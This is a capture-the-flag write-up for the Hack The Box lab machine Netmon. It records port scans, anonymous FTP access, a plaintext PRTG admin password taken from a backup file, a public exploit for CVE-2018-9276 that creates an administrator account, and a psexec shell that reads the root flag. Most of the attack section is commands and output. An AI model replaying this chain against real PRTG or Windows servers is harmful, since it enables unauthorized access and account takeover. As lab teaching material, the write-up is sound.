Netmon

Back

Ports scan

u505@kali:~/HTB/Machines/Netmon$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.152 --rate=1000
[sudo] password for u505:


Starting masscan 1.0.5 at 2020-02-19 14:21:35 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49665/tcp on 10.10.10.152
Discovered open port 49664/tcp on 10.10.10.152
Discovered open port 80/tcp on 10.10.10.152
Discovered open port 49668/tcp on 10.10.10.152
Discovered open port 21/tcp on 10.10.10.152
Discovered open port 445/tcp on 10.10.10.152
Discovered open port 5985/tcp on 10.10.10.152
Discovered open port 47001/tcp on 10.10.10.152
Discovered open port 49669/tcp on 10.10.10.152
Discovered open port 139/tcp on 10.10.10.152
Discovered open port 135/tcp on 10.10.10.152
Discovered open port 49666/tcp on 10.10.10.152
Discovered open port 49667/tcp on 10.10.10.152

u505@kali:~/HTB/Machines/Netmon$ nmap -sC -sV 10.10.10.152
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-19 09:21 EST
Nmap scan report for netmon.htb (10.10.10.152)
Host is up (0.037s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows


Host script results:
|_clock-skew: mean: 1m08s, deviation: 0s, median: 1m08s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-02-19T14:23:03
|_  start_date: 2020-02-19T14:19:50


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.13 seconds

User flag

The user flag is accessible by anonymous ftp.

u505@kali:~/HTB/Machines/Netmon$ ftp netmon
Connected to netmon.htb.
220 Microsoft FTP Service
Name (netmon:u505): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> cd Users/Public
250 CWD command successful.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.04 secs (0.8474 kB/s)
ftp> quit
221 Goodbye.
u505@kali:~/HTB/Machines/Netmon$ cat user.txt
<USER_FLAG>

PRTG Vulnerability

u505@kali:~/HTB/Machines/Netmon$ searchsploit prtg
--------------------------------------------------- ----------------------------------------
 Exploit Title                                     |  Path
                                                   | (/usr/share/exploitdb/)
--------------------------------------------------- ----------------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Rem | exploits/windows/webapps/46527.sh
PRTG Network Monitor < 18.1.39.1648 - Stack Overfl | exploits/windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scri | exploits/java/webapps/34108.txt
--------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

u505@kali:~/HTB/Machines/Netmon$ searchsploit -m 46527
  Exploit: PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46527
     Path: /usr/share/exploitdb/exploits/windows/webapps/46527.sh
File Type: Bourne-Again shell script, ASCII text executable, with very long lines, with CRLF line terminators


Copied to: /home/u505/HTB/Machines/Netmon/46527.sh

We remove the carriage returns.

u505@kali:~/HTB/Machines/Netmon$ tr -d '\r' <46527.sh > 46527noCR.sh
u505@kali:~/HTB/Machines/Netmon$ chmod +x 46527noCR.sh

This vulnerability creates a OS admin user in the target, but we need valid credentials to log into PRTG.

u505@kali:~/HTB/Machines/Netmon$ ./46527noCR.sh

[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution                [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019                                                        [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*]
[+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*]
[*] Version: 18.2.38                                                        [*]
[*] CVE: CVE-2018-9276                                                      [*]
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*]
[+]#########################################################################[+]


# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'


[+]#########################################################################[+]
 EXAMPLE USAGE: ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"

PRTG user and password

After some diving in the ftp, there is a file with a user and password.

u505@kali:~/HTB/Machines/Netmon$ ftp netmon.htb
Connected to netmon.htb.
220 Microsoft FTP Service
Name (netmon.htb:u505): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> cd "/Users/All Users/Paessler/PRTG Network Monitor"
250 CWD command successful.
ftp> dir -a
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-19-20  10:01AM       <DIR>          Configuration Auto-Backups
02-19-20  07:00PM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
02-20-20  12:00AM       <DIR>          Logs (Web Server)
02-19-20  07:01PM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
02-20-20  09:07AM              1732362 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get "PRTG Configuration.old.bak"
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1153755 bytes received in 0.50 secs (2.2227 MB/s)
ftp> quit
221 Goodbye.
u505@kali:~/HTB/Machines/Netmon$ grep -A4 "dbpassword" "PRTG Configuration.old.bak"
           <dbpassword>
             <!-- User: prtgadmin -->
             PrTg@dmin2018
           </dbpassword>
...

The password doesn't work.

The backup is from 2018, the rest of the files are from 2019, the same password with 2019 instead of 2018 works.

Run the exploit

With the values of the authenticated cookie, we run the exploit. This exploit creates a administrator user in the server.

u505@kali:~/HTB/Machines/Netmon$ ./46527noCR.sh -u http://netmon.htb -c "_ga=GA1.2.1897676822.1582207400; _gid=GA1.2.720517085.1582207400; OCTOPUS1813713946=ezlFNUE1MTZBLTg2QzUtNDkxNS1BNEYwLTNGMUU0RUM4NEE0Mn0%3D; _gat=1"


[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution                [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019                                                        [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*]
[+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*]
[*] Version: 18.2.38                                                        [*]
[*] CVE: CVE-2018-9276                                                      [*]
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*]
[+]#########################################################################[+]


# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'


[+]#########################################################################[+]


 [*] file created
 [*] sending notification wait....


 [*] adding a new user 'pentest' with password 'P3nT3st'
 [*] sending notification wait....


 [*] adding a user pentest to the administrators group
 [*] sending notification wait....




 [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!

Cookie values

We retrieve cookie values needed by the exploit.

Root flag

u505@kali:~/HTB/Machines/Netmon$ /opt/utils/impacket/examples/psexec.py pentest@netmon.htb
Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation


Password:
[*] Requesting shares on netmon.htb.....
[*] Found writable share ADMIN$
[*] Uploading file prgVfgJZ.exe
[*] Opening SVCManager on netmon.htb.....
[*] Creating service zFnr on netmon.htb.....
[*] Starting service zFnr.....
[!] Press help for extra shell commands                                               
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd "C:\Users\Administrator\Desktop"
C:\Users\Administrator\Desktop>type root.txt                                          
<ROOT_FLAG>
C:\Users\Administrator\Desktop>exit                                                   
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on netmon.htb.....
[*] Stopping service zFnr.....
[*] Removing service zFnr.....
[*] Removing file prgVfgJZ.exe.....

References

Daniel Simao 08:05, 19 February 2020 (EST)